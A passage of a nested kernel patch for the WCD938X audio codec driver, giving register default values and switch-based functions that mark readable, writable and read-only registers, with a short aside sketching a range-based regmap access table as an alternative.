++	{WCD938X_DIGITAL_DRIVE_STRENGTH_1,                     0x00},
++	{WCD938X_DIGITAL_DRIVE_STRENGTH_2,                     0x00},
++	{WCD938X_DIGITAL_RX_DATA_EDGE_CTL,                     0x1F},
++	{WCD938X_DIGITAL_TX_DATA_EDGE_CTL,                     0x80},
++	{WCD938X_DIGITAL_GPIO_MODE,                            0x00},
++	{WCD938X_DIGITAL_PIN_CTL_OE,                           0x00},
++	{WCD938X_DIGITAL_PIN_CTL_DATA_0,                       0x00},
++	{WCD938X_DIGITAL_PIN_CTL_DATA_1,                       0x00},
++	{WCD938X_DIGITAL_PIN_STATUS_0,                         0x00},
++	{WCD938X_DIGITAL_PIN_STATUS_1,                         0x00},
++	{WCD938X_DIGITAL_DIG_DEBUG_CTL,                        0x00},
++	{WCD938X_DIGITAL_DIG_DEBUG_EN,                         0x00},
++	{WCD938X_DIGITAL_ANA_CSR_DBG_ADD,                      0x00},
++	{WCD938X_DIGITAL_ANA_CSR_DBG_CTL,                      0x48},
++	{WCD938X_DIGITAL_SSP_DBG,                              0x00},
++	{WCD938X_DIGITAL_MODE_STATUS_0,                        0x00},
++	{WCD938X_DIGITAL_MODE_STATUS_1,                        0x00},
++	{WCD938X_DIGITAL_SPARE_0,                              0x00},
++	{WCD938X_DIGITAL_SPARE_1,                              0x00},
++	{WCD938X_DIGITAL_SPARE_2,                              0x00},
++	{WCD938X_DIGITAL_EFUSE_REG_0,                          0x00},
++	{WCD938X_DIGITAL_EFUSE_REG_1,                          0xFF},
++	{WCD938X_DIGITAL_EFUSE_REG_2,                          0xFF},
++	{WCD938X_DIGITAL_EFUSE_REG_3,                          0xFF},
++	{WCD938X_DIGITAL_EFUSE_REG_4,                          0xFF},
++	{WCD938X_DIGITAL_EFUSE_REG_5,                          0xFF},
++	{WCD938X_DIGITAL_EFUSE_REG_6,                          0xFF},
++	{WCD938X_DIGITAL_EFUSE_REG_7,                          0xFF},
++	{WCD938X_DIGITAL_EFUSE_REG_8,                          0xFF},
++	{WCD938X_DIGITAL_EFUSE_REG_9,                          0xFF},
++	{WCD938X_DIGITAL_EFUSE_REG_10,                         0xFF},
++	{WCD938X_DIGITAL_EFUSE_REG_11,                         0xFF},
++	{WCD938X_DIGITAL_EFUSE_REG_12,                         0xFF},
++	{WCD938X_DIGITAL_EFUSE_REG_13,                         0xFF},
++	{WCD938X_DIGITAL_EFUSE_REG_14,                         0xFF},
++	{WCD938X_DIGITAL_EFUSE_REG_15,                         0xFF},
++	{WCD938X_DIGITAL_EFUSE_REG_16,                         0xFF},
++	{WCD938X_DIGITAL_EFUSE_REG_17,                         0xFF},
++	{WCD938X_DIGITAL_EFUSE_REG_18,                         0xFF},
++	{WCD938X_DIGITAL_EFUSE_REG_19,                         0xFF},
++	{WCD938X_DIGITAL_EFUSE_REG_20,                         0x0E},
++	{WCD938X_DIGITAL_EFUSE_REG_21,                         0x00},
++	{WCD938X_DIGITAL_EFUSE_REG_22,                         0x00},
++	{WCD938X_DIGITAL_EFUSE_REG_23,                         0xF8},
++	{WCD938X_DIGITAL_EFUSE_REG_24,                         0x16},
++	{WCD938X_DIGITAL_EFUSE_REG_25,                         0x00},
++	{WCD938X_DIGITAL_EFUSE_REG_26,                         0x00},
++	{WCD938X_DIGITAL_EFUSE_REG_27,                         0x00},
++	{WCD938X_DIGITAL_EFUSE_REG_28,                         0x00},
++	{WCD938X_DIGITAL_EFUSE_REG_29,                         0x00},
++	{WCD938X_DIGITAL_EFUSE_REG_30,                         0x00},
++	{WCD938X_DIGITAL_EFUSE_REG_31,                         0x00},
++	{WCD938X_DIGITAL_TX_REQ_FB_CTL_0,                      0x88},
++	{WCD938X_DIGITAL_TX_REQ_FB_CTL_1,                      0x88},
++	{WCD938X_DIGITAL_TX_REQ_FB_CTL_2,                      0x88},
++	{WCD938X_DIGITAL_TX_REQ_FB_CTL_3,                      0x88},
++	{WCD938X_DIGITAL_TX_REQ_FB_CTL_4,                      0x88},
++	{WCD938X_DIGITAL_DEM_BYPASS_DATA0,                     0x55},
++	{WCD938X_DIGITAL_DEM_BYPASS_DATA1,                     0x55},
++	{WCD938X_DIGITAL_DEM_BYPASS_DATA2,                     0x55},
++	{WCD938X_DIGITAL_DEM_BYPASS_DATA3,                     0x01},
++};
++
++static bool wcd938x_rdwr_register(struct device *dev, unsigned int reg)
++{
++	switch (reg) {
++	case WCD938X_ANA_PAGE_REGISTER:
++	case WCD938X_ANA_BIAS:
++	case WCD938X_ANA_RX_SUPPLIES:
++	case WCD938X_ANA_HPH:
++	case WCD938X_ANA_EAR:
++	case WCD938X_ANA_EAR_COMPANDER_CTL:
++	case WCD938X_ANA_TX_CH1:
++	case WCD938X_ANA_TX_CH2:
++	case WCD938X_ANA_TX_CH3:
++	case WCD938X_ANA_TX_CH4:
++	case WCD938X_ANA_MICB1_MICB2_DSP_EN_LOGIC:
++	case WCD938X_ANA_MICB3_DSP_EN_LOGIC:
++	case WCD938X_ANA_MBHC_MECH:
++	case WCD938X_ANA_MBHC_ELECT:
++	case WCD938X_ANA_MBHC_ZDET:
++	case WCD938X_ANA_MBHC_BTN0:
++	case WCD938X_ANA_MBHC_BTN1:
++	case WCD938X_ANA_MBHC_BTN2:
++	case WCD938X_ANA_MBHC_BTN3:
++	case WCD938X_ANA_MBHC_BTN4:
++	case WCD938X_ANA_MBHC_BTN5:
++	case WCD938X_ANA_MBHC_BTN6:
++	case WCD938X_ANA_MBHC_BTN7:
++	case WCD938X_ANA_MICB1:
++	case WCD938X_ANA_MICB2:
++	case WCD938X_ANA_MICB2_RAMP:
++	case WCD938X_ANA_MICB3:
++	case WCD938X_ANA_MICB4:
++	case WCD938X_BIAS_CTL:
++	case WCD938X_BIAS_VBG_FINE_ADJ:
++	case WCD938X_LDOL_VDDCX_ADJUST:
++	case WCD938X_LDOL_DISABLE_LDOL:
++	case WCD938X_MBHC_CTL_CLK:
++	case WCD938X_MBHC_CTL_ANA:
++	case WCD938X_MBHC_CTL_SPARE_1:
++	case WCD938X_MBHC_CTL_SPARE_2:
++	case WCD938X_MBHC_CTL_BCS:
++	case WCD938X_MBHC_TEST_CTL:
++	case WCD938X_LDOH_MODE:
++	case WCD938X_LDOH_BIAS:
++	case WCD938X_LDOH_STB_LOADS:
++	case WCD938X_LDOH_SLOWRAMP:
++	case WCD938X_MICB1_TEST_CTL_1:
++	case WCD938X_MICB1_TEST_CTL_2:
++	case WCD938X_MICB1_TEST_CTL_3:
++	case WCD938X_MICB2_TEST_CTL_1:
++	case WCD938X_MICB2_TEST_CTL_2:
++	case WCD938X_MICB2_TEST_CTL_3:
++	case WCD938X_MICB3_TEST_CTL_1:
++	case WCD938X_MICB3_TEST_CTL_2:
++	case WCD938X_MICB3_TEST_CTL_3:
++	case WCD938X_MICB4_TEST_CTL_1:
++	case WCD938X_MICB4_TEST_CTL_2:
++	case WCD938X_MICB4_TEST_CTL_3:
++	case WCD938X_TX_COM_ADC_VCM:
++	case WCD938X_TX_COM_BIAS_ATEST:
++	case WCD938X_TX_COM_SPARE1:
++	case WCD938X_TX_COM_SPARE2:
++	case WCD938X_TX_COM_TXFE_DIV_CTL:
++	case WCD938X_TX_COM_TXFE_DIV_START:
++	case WCD938X_TX_COM_SPARE3:
++	case WCD938X_TX_COM_SPARE4:
++	case WCD938X_TX_1_2_TEST_EN:
++	case WCD938X_TX_1_2_ADC_IB:
++	case WCD938X_TX_1_2_ATEST_REFCTL:
++	case WCD938X_TX_1_2_TEST_CTL:
++	case WCD938X_TX_1_2_TEST_BLK_EN1:
++	case WCD938X_TX_1_2_TXFE1_CLKDIV:
++	case WCD938X_TX_3_4_TEST_EN:
++	case WCD938X_TX_3_4_ADC_IB:
++	case WCD938X_TX_3_4_ATEST_REFCTL:
++	case WCD938X_TX_3_4_TEST_CTL:
++	case WCD938X_TX_3_4_TEST_BLK_EN3:
++	case WCD938X_TX_3_4_TXFE3_CLKDIV:
++	case WCD938X_TX_3_4_TEST_BLK_EN2:
++	case WCD938X_TX_3_4_TXFE2_CLKDIV:
++	case WCD938X_TX_3_4_SPARE1:
++	case WCD938X_TX_3_4_TEST_BLK_EN4:
++	case WCD938X_TX_3_4_TXFE4_CLKDIV:
++	case WCD938X_TX_3_4_SPARE2:
++	case WCD938X_CLASSH_MODE_1:
++	case WCD938X_CLASSH_MODE_2:
++	case WCD938X_CLASSH_MODE_3:
++	case WCD938X_CLASSH_CTRL_VCL_1:
++	case WCD938X_CLASSH_CTRL_VCL_2:
++	case WCD938X_CLASSH_CTRL_CCL_1:
++	case WCD938X_CLASSH_CTRL_CCL_2:
++	case WCD938X_CLASSH_CTRL_CCL_3:
++	case WCD938X_CLASSH_CTRL_CCL_4:
++	case WCD938X_CLASSH_CTRL_CCL_5:
++	case WCD938X_CLASSH_BUCK_TMUX_A_D:
++	case WCD938X_CLASSH_BUCK_SW_DRV_CNTL:
++	case WCD938X_CLASSH_SPARE:
++	case WCD938X_FLYBACK_EN:
++	case WCD938X_FLYBACK_VNEG_CTRL_1:
++	case WCD938X_FLYBACK_VNEG_CTRL_2:
++	case WCD938X_FLYBACK_VNEG_CTRL_3:
++	case WCD938X_FLYBACK_VNEG_CTRL_4:
++	case WCD938X_FLYBACK_VNEG_CTRL_5:
++	case WCD938X_FLYBACK_VNEG_CTRL_6:
++	case WCD938X_FLYBACK_VNEG_CTRL_7:
++	case WCD938X_FLYBACK_VNEG_CTRL_8:
++	case WCD938X_FLYBACK_VNEG_CTRL_9:
++	case WCD938X_FLYBACK_VNEGDAC_CTRL_1:
++	case WCD938X_FLYBACK_VNEGDAC_CTRL_2:
++	case WCD938X_FLYBACK_VNEGDAC_CTRL_3:
++	case WCD938X_FLYBACK_CTRL_1:
++	case WCD938X_FLYBACK_TEST_CTL:
++	case WCD938X_RX_AUX_SW_CTL:
++	case WCD938X_RX_PA_AUX_IN_CONN:
++	case WCD938X_RX_TIMER_DIV:
++	case WCD938X_RX_OCP_CTL:
++	case WCD938X_RX_OCP_COUNT:
++	case WCD938X_RX_BIAS_EAR_DAC:
++	case WCD938X_RX_BIAS_EAR_AMP:
++	case WCD938X_RX_BIAS_HPH_LDO:
++	case WCD938X_RX_BIAS_HPH_PA:
++	case WCD938X_RX_BIAS_HPH_RDACBUFF_CNP2:
++	case WCD938X_RX_BIAS_HPH_RDAC_LDO:
++	case WCD938X_RX_BIAS_HPH_CNP1:
++	case WCD938X_RX_BIAS_HPH_LOWPOWER:
++	case WCD938X_RX_BIAS_AUX_DAC:
++	case WCD938X_RX_BIAS_AUX_AMP:
++	case WCD938X_RX_BIAS_VNEGDAC_BLEEDER:
++	case WCD938X_RX_BIAS_MISC:
++	case WCD938X_RX_BIAS_BUCK_RST:
++	case WCD938X_RX_BIAS_BUCK_VREF_ERRAMP:
++	case WCD938X_RX_BIAS_FLYB_ERRAMP:
++	case WCD938X_RX_BIAS_FLYB_BUFF:
++	case WCD938X_RX_BIAS_FLYB_MID_RST:
++	case WCD938X_HPH_CNP_EN:
++	case WCD938X_HPH_CNP_WG_CTL:
++	case WCD938X_HPH_CNP_WG_TIME:
++	case WCD938X_HPH_OCP_CTL:
++	case WCD938X_HPH_AUTO_CHOP:
++	case WCD938X_HPH_CHOP_CTL:
++	case WCD938X_HPH_PA_CTL1:
++	case WCD938X_HPH_PA_CTL2:
++	case WCD938X_HPH_L_EN:
++	case WCD938X_HPH_L_TEST:
++	case WCD938X_HPH_L_ATEST:
++	case WCD938X_HPH_R_EN:
++	case WCD938X_HPH_R_TEST:
++	case WCD938X_HPH_R_ATEST:
++	case WCD938X_HPH_RDAC_CLK_CTL1:
++	case WCD938X_HPH_RDAC_CLK_CTL2:
++	case WCD938X_HPH_RDAC_LDO_CTL:
++	case WCD938X_HPH_RDAC_CHOP_CLK_LP_CTL:
++	case WCD938X_HPH_REFBUFF_UHQA_CTL:
++	case WCD938X_HPH_REFBUFF_LP_CTL:
++	case WCD938X_HPH_L_DAC_CTL:
++	case WCD938X_HPH_R_DAC_CTL:
++	case WCD938X_HPH_SURGE_HPHLR_SURGE_COMP_SEL:
++	case WCD938X_HPH_SURGE_HPHLR_SURGE_EN:
++	case WCD938X_HPH_SURGE_HPHLR_SURGE_MISC1:
++	case WCD938X_EAR_EAR_EN_REG:
++	case WCD938X_EAR_EAR_PA_CON:
++	case WCD938X_EAR_EAR_SP_CON:
++	case WCD938X_EAR_EAR_DAC_CON:
++	case WCD938X_EAR_EAR_CNP_FSM_CON:
++	case WCD938X_EAR_TEST_CTL:
++	case WCD938X_ANA_NEW_PAGE_REGISTER:
++	case WCD938X_HPH_NEW_ANA_HPH2:
++	case WCD938X_HPH_NEW_ANA_HPH3:
++	case WCD938X_SLEEP_CTL:
++	case WCD938X_SLEEP_WATCHDOG_CTL:
++	case WCD938X_MBHC_NEW_ELECT_REM_CLAMP_CTL:
++	case WCD938X_MBHC_NEW_CTL_1:
++	case WCD938X_MBHC_NEW_CTL_2:
++	case WCD938X_MBHC_NEW_PLUG_DETECT_CTL:
++	case WCD938X_MBHC_NEW_ZDET_ANA_CTL:
++	case WCD938X_MBHC_NEW_ZDET_RAMP_CTL:
++	case WCD938X_TX_NEW_AMIC_MUX_CFG:
++	case WCD938X_AUX_AUXPA:
++	case WCD938X_LDORXTX_MODE:
++	case WCD938X_LDORXTX_CONFIG:
++	case WCD938X_DIE_CRACK_DIE_CRK_DET_EN:
++	case WCD938X_HPH_NEW_INT_RDAC_GAIN_CTL:
++	case WCD938X_HPH_NEW_INT_RDAC_HD2_CTL_L:
++	case WCD938X_HPH_NEW_INT_RDAC_VREF_CTL:
++	case WCD938X_HPH_NEW_INT_RDAC_OVERRIDE_CTL:
++	case WCD938X_HPH_NEW_INT_RDAC_HD2_CTL_R:
++	case WCD938X_HPH_NEW_INT_PA_MISC1:
++	case WCD938X_HPH_NEW_INT_PA_MISC2:
++	case WCD938X_HPH_NEW_INT_PA_RDAC_MISC:
++	case WCD938X_HPH_NEW_INT_HPH_TIMER1:
++	case WCD938X_HPH_NEW_INT_HPH_TIMER2:
++	case WCD938X_HPH_NEW_INT_HPH_TIMER3:
++	case WCD938X_HPH_NEW_INT_HPH_TIMER4:
++	case WCD938X_HPH_NEW_INT_PA_RDAC_MISC2:
++	case WCD938X_HPH_NEW_INT_PA_RDAC_MISC3:
++	case WCD938X_HPH_NEW_INT_RDAC_HD2_CTL_L_NEW:
++	case WCD938X_HPH_NEW_INT_RDAC_HD2_CTL_R_NEW:
++	case WCD938X_RX_NEW_INT_HPH_RDAC_BIAS_LOHIFI:
++	case WCD938X_RX_NEW_INT_HPH_RDAC_BIAS_ULP:
++	case WCD938X_RX_NEW_INT_HPH_RDAC_LDO_LP:
++	case WCD938X_MBHC_NEW_INT_MOISTURE_DET_DC_CTRL:
++	case WCD938X_MBHC_NEW_INT_MOISTURE_DET_POLLING_CTRL:
++	case WCD938X_MBHC_NEW_INT_MECH_DET_CURRENT:
++	case WCD938X_MBHC_NEW_INT_SPARE_2:
++	case WCD938X_EAR_INT_NEW_EAR_CHOPPER_CON:
++	case WCD938X_EAR_INT_NEW_CNP_VCM_CON1:
++	case WCD938X_EAR_INT_NEW_CNP_VCM_CON2:
++	case WCD938X_EAR_INT_NEW_EAR_DYNAMIC_BIAS:
++	case WCD938X_AUX_INT_EN_REG:
++	case WCD938X_AUX_INT_PA_CTRL:
++	case WCD938X_AUX_INT_SP_CTRL:
++	case WCD938X_AUX_INT_DAC_CTRL:
++	case WCD938X_AUX_INT_CLK_CTRL:
++	case WCD938X_AUX_INT_TEST_CTRL:
++	case WCD938X_AUX_INT_MISC:
++	case WCD938X_LDORXTX_INT_BIAS:
++	case WCD938X_LDORXTX_INT_STB_LOADS_DTEST:
++	case WCD938X_LDORXTX_INT_TEST0:
++	case WCD938X_LDORXTX_INT_STARTUP_TIMER:
++	case WCD938X_LDORXTX_INT_TEST1:
++	case WCD938X_SLEEP_INT_WATCHDOG_CTL_1:
++	case WCD938X_SLEEP_INT_WATCHDOG_CTL_2:
++	case WCD938X_DIE_CRACK_INT_DIE_CRK_DET_INT1:
++	case WCD938X_DIE_CRACK_INT_DIE_CRK_DET_INT2:
++	case WCD938X_TX_COM_NEW_INT_TXFE_DIVSTOP_L2:
++	case WCD938X_TX_COM_NEW_INT_TXFE_DIVSTOP_L1:
++	case WCD938X_TX_COM_NEW_INT_TXFE_DIVSTOP_L0:
++	case WCD938X_TX_COM_NEW_INT_TXFE_DIVSTOP_ULP1P2M:
++	case WCD938X_TX_COM_NEW_INT_TXFE_DIVSTOP_ULP0P6M:
++	case WCD938X_TX_COM_NEW_INT_TXFE_ICTRL_STG1_L2L1:
++	case WCD938X_TX_COM_NEW_INT_TXFE_ICTRL_STG1_L0:
++	case WCD938X_TX_COM_NEW_INT_TXFE_ICTRL_STG1_ULP:
++	case WCD938X_TX_COM_NEW_INT_TXFE_ICTRL_STG2MAIN_L2L1:
++	case WCD938X_TX_COM_NEW_INT_TXFE_ICTRL_STG2MAIN_L0:
++	case WCD938X_TX_COM_NEW_INT_TXFE_ICTRL_STG2MAIN_ULP:
++	case WCD938X_TX_COM_NEW_INT_TXFE_ICTRL_STG2CASC_L2L1L0:
++	case WCD938X_TX_COM_NEW_INT_TXFE_ICTRL_STG2CASC_ULP:
++	case WCD938X_TX_COM_NEW_INT_TXADC_SCBIAS_L2L1:
++	case WCD938X_TX_COM_NEW_INT_TXADC_SCBIAS_L0ULP:
++	case WCD938X_TX_COM_NEW_INT_TXADC_INT_L2:
++	case WCD938X_TX_COM_NEW_INT_TXADC_INT_L1:
++	case WCD938X_TX_COM_NEW_INT_TXADC_INT_L0:
++	case WCD938X_TX_COM_NEW_INT_TXADC_INT_ULP:
++	case WCD938X_DIGITAL_PAGE_REGISTER:
++	case WCD938X_DIGITAL_SWR_TX_CLK_RATE:
++	case WCD938X_DIGITAL_CDC_RST_CTL:
++	case WCD938X_DIGITAL_TOP_CLK_CFG:
++	case WCD938X_DIGITAL_CDC_ANA_CLK_CTL:
++	case WCD938X_DIGITAL_CDC_DIG_CLK_CTL:
++	case WCD938X_DIGITAL_SWR_RST_EN:
++	case WCD938X_DIGITAL_CDC_PATH_MODE:
++	case WCD938X_DIGITAL_CDC_RX_RST:
++	case WCD938X_DIGITAL_CDC_RX0_CTL:
++	case WCD938X_DIGITAL_CDC_RX1_CTL:
++	case WCD938X_DIGITAL_CDC_RX2_CTL:
++	case WCD938X_DIGITAL_CDC_TX_ANA_MODE_0_1:
++	case WCD938X_DIGITAL_CDC_TX_ANA_MODE_2_3:
++	case WCD938X_DIGITAL_CDC_COMP_CTL_0:
++	case WCD938X_DIGITAL_CDC_ANA_TX_CLK_CTL:
++	case WCD938X_DIGITAL_CDC_HPH_DSM_A1_0:
++	case WCD938X_DIGITAL_CDC_HPH_DSM_A1_1:
++	case WCD938X_DIGITAL_CDC_HPH_DSM_A2_0:
++	case WCD938X_DIGITAL_CDC_HPH_DSM_A2_1:
++	case WCD938X_DIGITAL_CDC_HPH_DSM_A3_0:
++	case WCD938X_DIGITAL_CDC_HPH_DSM_A3_1:
++	case WCD938X_DIGITAL_CDC_HPH_DSM_A4_0:
++	case WCD938X_DIGITAL_CDC_HPH_DSM_A4_1:
++	case WCD938X_DIGITAL_CDC_HPH_DSM_A5_0:
++	case WCD938X_DIGITAL_CDC_HPH_DSM_A5_1:
++	case WCD938X_DIGITAL_CDC_HPH_DSM_A6_0:
++	case WCD938X_DIGITAL_CDC_HPH_DSM_A7_0:
++	case WCD938X_DIGITAL_CDC_HPH_DSM_C_0:
++	case WCD938X_DIGITAL_CDC_HPH_DSM_C_1:
++	case WCD938X_DIGITAL_CDC_HPH_DSM_C_2:
++	case WCD938X_DIGITAL_CDC_HPH_DSM_C_3:
++	case WCD938X_DIGITAL_CDC_HPH_DSM_R1:
++	case WCD938X_DIGITAL_CDC_HPH_DSM_R2:
++	case WCD938X_DIGITAL_CDC_HPH_DSM_R3:
++	case WCD938X_DIGITAL_CDC_HPH_DSM_R4:
++	case WCD938X_DIGITAL_CDC_HPH_DSM_R5:
++	case WCD938X_DIGITAL_CDC_HPH_DSM_R6:
++	case WCD938X_DIGITAL_CDC_HPH_DSM_R7:
++	case WCD938X_DIGITAL_CDC_AUX_DSM_A1_0:
++	case WCD938X_DIGITAL_CDC_AUX_DSM_A1_1:
++	case WCD938X_DIGITAL_CDC_AUX_DSM_A2_0:
++	case WCD938X_DIGITAL_CDC_AUX_DSM_A2_1:
++	case WCD938X_DIGITAL_CDC_AUX_DSM_A3_0:
++	case WCD938X_DIGITAL_CDC_AUX_DSM_A3_1:
++	case WCD938X_DIGITAL_CDC_AUX_DSM_A4_0:
++	case WCD938X_DIGITAL_CDC_AUX_DSM_A4_1:
++	case WCD938X_DIGITAL_CDC_AUX_DSM_A5_0:
++	case WCD938X_DIGITAL_CDC_AUX_DSM_A5_1:
++	case WCD938X_DIGITAL_CDC_AUX_DSM_A6_0:
++	case WCD938X_DIGITAL_CDC_AUX_DSM_A7_0:
++	case WCD938X_DIGITAL_CDC_AUX_DSM_C_0:
++	case WCD938X_DIGITAL_CDC_AUX_DSM_C_1:
++	case WCD938X_DIGITAL_CDC_AUX_DSM_C_2:
++	case WCD938X_DIGITAL_CDC_AUX_DSM_C_3:
++	case WCD938X_DIGITAL_CDC_AUX_DSM_R1:
++	case WCD938X_DIGITAL_CDC_AUX_DSM_R2:
++	case WCD938X_DIGITAL_CDC_AUX_DSM_R3:
++	case WCD938X_DIGITAL_CDC_AUX_DSM_R4:
++	case WCD938X_DIGITAL_CDC_AUX_DSM_R5:
++	case WCD938X_DIGITAL_CDC_AUX_DSM_R6:
++	case WCD938X_DIGITAL_CDC_AUX_DSM_R7:
++	case WCD938X_DIGITAL_CDC_HPH_GAIN_RX_0:
++	case WCD938X_DIGITAL_CDC_HPH_GAIN_RX_1:
++	case WCD938X_DIGITAL_CDC_HPH_GAIN_DSD_0:
++	case WCD938X_DIGITAL_CDC_HPH_GAIN_DSD_1:
++	case WCD938X_DIGITAL_CDC_HPH_GAIN_DSD_2:
++	case WCD938X_DIGITAL_CDC_AUX_GAIN_DSD_0:
++	case WCD938X_DIGITAL_CDC_AUX_GAIN_DSD_1:
++	case WCD938X_DIGITAL_CDC_AUX_GAIN_DSD_2:
++	case WCD938X_DIGITAL_CDC_HPH_GAIN_CTL:
++	case WCD938X_DIGITAL_CDC_AUX_GAIN_CTL:
++	case WCD938X_DIGITAL_CDC_EAR_PATH_CTL:
++	case WCD938X_DIGITAL_CDC_SWR_CLH:
++	case WCD938X_DIGITAL_SWR_CLH_BYP:
++	case WCD938X_DIGITAL_CDC_TX0_CTL:
++	case WCD938X_DIGITAL_CDC_TX1_CTL:
++	case WCD938X_DIGITAL_CDC_TX2_CTL:
++	case WCD938X_DIGITAL_CDC_TX_RST:
++	case WCD938X_DIGITAL_CDC_REQ_CTL:
++	case WCD938X_DIGITAL_CDC_RST:
++	case WCD938X_DIGITAL_CDC_AMIC_CTL:
++	case WCD938X_DIGITAL_CDC_DMIC_CTL:
++	case WCD938X_DIGITAL_CDC_DMIC1_CTL:
++	case WCD938X_DIGITAL_CDC_DMIC2_CTL:
++	case WCD938X_DIGITAL_CDC_DMIC3_CTL:
++	case WCD938X_DIGITAL_CDC_DMIC4_CTL:
++	case WCD938X_DIGITAL_EFUSE_PRG_CTL:
++	case WCD938X_DIGITAL_EFUSE_CTL:
++	case WCD938X_DIGITAL_CDC_DMIC_RATE_1_2:
++	case WCD938X_DIGITAL_CDC_DMIC_RATE_3_4:
++	case WCD938X_DIGITAL_PDM_WD_CTL0:
++	case WCD938X_DIGITAL_PDM_WD_CTL1:
++	case WCD938X_DIGITAL_PDM_WD_CTL2:
++	case WCD938X_DIGITAL_INTR_MODE:
++	case WCD938X_DIGITAL_INTR_MASK_0:
++	case WCD938X_DIGITAL_INTR_MASK_1:
++	case WCD938X_DIGITAL_INTR_MASK_2:
++	case WCD938X_DIGITAL_INTR_CLEAR_0:
++	case WCD938X_DIGITAL_INTR_CLEAR_1:
++	case WCD938X_DIGITAL_INTR_CLEAR_2:
++	case WCD938X_DIGITAL_INTR_LEVEL_0:
++	case WCD938X_DIGITAL_INTR_LEVEL_1:
++	case WCD938X_DIGITAL_INTR_LEVEL_2:
++	case WCD938X_DIGITAL_INTR_SET_0:
++	case WCD938X_DIGITAL_INTR_SET_1:
++	case WCD938X_DIGITAL_INTR_SET_2:
++	case WCD938X_DIGITAL_INTR_TEST_0:
++	case WCD938X_DIGITAL_INTR_TEST_1:
++	case WCD938X_DIGITAL_INTR_TEST_2:
++	case WCD938X_DIGITAL_TX_MODE_DBG_EN:
++	case WCD938X_DIGITAL_TX_MODE_DBG_0_1:
++	case WCD938X_DIGITAL_TX_MODE_DBG_2_3:
++	case WCD938X_DIGITAL_LB_IN_SEL_CTL:
++	case WCD938X_DIGITAL_LOOP_BACK_MODE:
++	case WCD938X_DIGITAL_SWR_DAC_TEST:
++	case WCD938X_DIGITAL_SWR_HM_TEST_RX_0:
++	case WCD938X_DIGITAL_SWR_HM_TEST_TX_0:
++	case WCD938X_DIGITAL_SWR_HM_TEST_RX_1:
++	case WCD938X_DIGITAL_SWR_HM_TEST_TX_1:
++	case WCD938X_DIGITAL_SWR_HM_TEST_TX_2:
++	case WCD938X_DIGITAL_PAD_CTL_SWR_0:
++	case WCD938X_DIGITAL_PAD_CTL_SWR_1:
++	case WCD938X_DIGITAL_I2C_CTL:
++	case WCD938X_DIGITAL_CDC_TX_TANGGU_SW_MODE:
++	case WCD938X_DIGITAL_EFUSE_TEST_CTL_0:
++	case WCD938X_DIGITAL_EFUSE_TEST_CTL_1:
++	case WCD938X_DIGITAL_PAD_CTL_PDM_RX0:
++	case WCD938X_DIGITAL_PAD_CTL_PDM_RX1:
++	case WCD938X_DIGITAL_PAD_CTL_PDM_TX0:
++	case WCD938X_DIGITAL_PAD_CTL_PDM_TX1:
++	case WCD938X_DIGITAL_PAD_CTL_PDM_TX2:
++	case WCD938X_DIGITAL_PAD_INP_DIS_0:
++	case WCD938X_DIGITAL_PAD_INP_DIS_1:
++	case WCD938X_DIGITAL_DRIVE_STRENGTH_0:
++	case WCD938X_DIGITAL_DRIVE_STRENGTH_1:
++	case WCD938X_DIGITAL_DRIVE_STRENGTH_2:
++	case WCD938X_DIGITAL_RX_DATA_EDGE_CTL:
++	case WCD938X_DIGITAL_TX_DATA_EDGE_CTL:
++	case WCD938X_DIGITAL_GPIO_MODE:
++	case WCD938X_DIGITAL_PIN_CTL_OE:
++	case WCD938X_DIGITAL_PIN_CTL_DATA_0:
++	case WCD938X_DIGITAL_PIN_CTL_DATA_1:
++	case WCD938X_DIGITAL_DIG_DEBUG_CTL:
++	case WCD938X_DIGITAL_DIG_DEBUG_EN:
++	case WCD938X_DIGITAL_ANA_CSR_DBG_ADD:
++	case WCD938X_DIGITAL_ANA_CSR_DBG_CTL:
++	case WCD938X_DIGITAL_SSP_DBG:
++	case WCD938X_DIGITAL_SPARE_0:
++	case WCD938X_DIGITAL_SPARE_1:
++	case WCD938X_DIGITAL_SPARE_2:
++	case WCD938X_DIGITAL_TX_REQ_FB_CTL_0:
++	case WCD938X_DIGITAL_TX_REQ_FB_CTL_1:
++	case WCD938X_DIGITAL_TX_REQ_FB_CTL_2:
++	case WCD938X_DIGITAL_TX_REQ_FB_CTL_3:
++	case WCD938X_DIGITAL_TX_REQ_FB_CTL_4:
++	case WCD938X_DIGITAL_DEM_BYPASS_DATA0:
++	case WCD938X_DIGITAL_DEM_BYPASS_DATA1:
++	case WCD938X_DIGITAL_DEM_BYPASS_DATA2:
++	case WCD938X_DIGITAL_DEM_BYPASS_DATA3:
++		return true;
++	}
++
++	return false;
++}
++
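For reference, regmap can also express access rules as register ranges instead
of a per-register switch; where the map is largely contiguous that is more
compact. A minimal sketch of that alternative, with illustrative (not
exhaustive) range endpoints borrowed from the case list above:

	static const struct regmap_range wcd938x_rd_yes_ranges[] = {
		/* illustrative run only; the real map is sparse */
		regmap_reg_range(WCD938X_ANA_PAGE_REGISTER, WCD938X_ANA_MICB4),
	};

	static const struct regmap_access_table wcd938x_rd_table = {
		.yes_ranges = wcd938x_rd_yes_ranges,
		.n_yes_ranges = ARRAY_SIZE(wcd938x_rd_yes_ranges),
	};

	/* hooked up via .rd_table = &wcd938x_rd_table in regmap_config */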
++static bool wcd938x_readonly_register(struct device *dev, unsigned int reg)
++{
++	switch (reg) {
++	case WCD938X_ANA_MBHC_RESULT_1:
++	case WCD938X_ANA_MBHC_RESULT_2:
++	case WCD938X_ANA_MBHC_RESULT_3:
++	case WCD938X_MBHC_MOISTURE_DET_FSM_STATUS:
++	case WCD938X_TX_1_2_SAR2_ERR:
++	case WCD938X_TX_1_2_SAR1_ERR:
++	case WCD938X_TX_3_4_SAR4_ERR:
++	case WCD938X_TX_3_4_SAR3_ERR:
++	case WCD938X_HPH_L_STATUS:
++	case WCD938X_HPH_R_STATUS:
++	case WCD938X_HPH_SURGE_HPHLR_SURGE_STATUS:
++	case WCD938X_EAR_STATUS_REG_1:
++	case WCD938X_EAR_STATUS_REG_2:
++	case WCD938X_MBHC_NEW_FSM_STATUS:
++	case WCD938X_MBHC_NEW_ADC_RESULT:
++	case WCD938X_DIE_CRACK_DIE_CRK_DET_OUT:
++	case WCD938X_AUX_INT_STATUS_REG:
++	case WCD938X_LDORXTX_INT_STATUS:
++	case WCD938X_DIGITAL_CHIP_ID0:
++	case WCD938X_DIGITAL_CHIP_ID1:
++	case WCD938X_DIGITAL_CHIP_ID2:
++	case WCD938X_DIGITAL_CHIP_ID3:
++	case WCD938X_DIGITAL_INTR_STATUS_0:
++	case WCD938X_DIGITAL_INTR_STATUS_1:
